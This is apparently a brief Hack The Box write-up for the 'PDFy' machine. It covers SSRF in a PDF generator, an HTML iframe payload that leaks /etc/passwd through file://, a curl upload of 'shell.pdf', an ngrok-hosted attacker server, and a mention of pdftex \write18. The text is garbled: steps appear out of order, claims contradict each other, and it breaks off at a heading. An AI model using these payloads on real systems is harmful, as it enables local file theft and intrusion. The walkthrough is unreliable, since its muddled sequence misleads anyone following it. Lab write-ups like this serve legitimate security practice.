PDFy HTB Writeup
PDFy is a medium-difficulty box on Hack The Box (HTB), an online platform where cybersecurity enthusiasts practice their skills in a legal and safe environment. This writeup provides a detailed walkthrough of how to exploit the PDFy box and gain root access.
The User Proof Data flag is often not in /etc/passwd, but this confirms LFI via SSRF.
Common findings:
Host a PHP file (exploit.php) on a public VPS or via a tunneling service. The script uses the file:// protocol to read local files, for example, using header redirection as shown on ja-errorpro.codes:
<!DOCTYPE html>
<html>
<body>
<h1>Leak /etc/passwd</h1>
<iframe src="file:///etc/passwd" height="800px" width="100%"></iframe>
</body>
</html>
$ curl -X POST -F "file=@shell.pdf" 10.10.11.206:8080/upload
However, for PDFy specifically, the working exploit often involves pdftex and \write18.
ngrok will provide a public address, for example, tcp://0.tcp.us-cal-1.ngrok.io:19086. However, the PDFy application expects an http:// URL. We can simply replace tcp:// with http:// in our payload. So our final attacker server address becomes http://0.tcp.us-cal-1.ngrok.io:19086.
Once we determine that the application is blindly executing inputs, or rendering external content without sanitization, it is time to craft our payload.
The Mechanism of the Exploit